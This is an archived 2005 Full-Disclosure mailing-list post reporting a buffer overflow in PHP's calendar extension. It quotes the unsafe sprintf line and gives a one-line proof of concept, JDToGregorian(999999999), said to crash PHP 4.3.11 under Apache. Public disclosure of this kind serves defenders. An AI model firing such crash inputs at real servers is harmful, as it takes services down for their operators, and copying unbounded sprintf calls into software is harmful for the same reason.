Re: [Full-disclosure] PHP: Calendar Buffer Overflow

From: FistFucker (FistFuXXer_at_gmx.de)
Date: 06/27/05

  • Next message: Reed Arvin: "[Full-disclosure] Denial of Service Vulnerability in True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051." 
    To: "Full-Disclosure" <full-disclosure@lists.grok.org.uk>
Date: Mon, 27 Jun 2005 07:02:58 +0200

    DoS screenshots attached, Apache and PHP

    ----- Original Message -----
    From: "FistFucker" <FistFuXXer@gmx.de>
    To: "Full-Disclosure" <full-disclosure@lists.grok.org.uk>
    Sent: Monday, June 27, 2005 6:34 AM
    Subject: [Full-disclosure] PHP: Calendar Buffer Overflow

    > There are some nice sprintf()'s in "\ext\calendar\calendar.c":
    > 'sprintf(date, "%i/%i/%i", month, day, year);'
    >
    > Example exploitation (4.3.11):
    >
    >
    > <?php
    >
    > JDToGregorian(999999999);
    >
    > ?>
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    > Hosted and sponsored by Secunia - http://secunia.com/
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/

    jdtogregorian_overflow3.jpg
    jdtogregorian_overflow4.jpg
  • Next message: Reed Arvin: "[Full-disclosure] Denial of Service Vulnerability in True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051."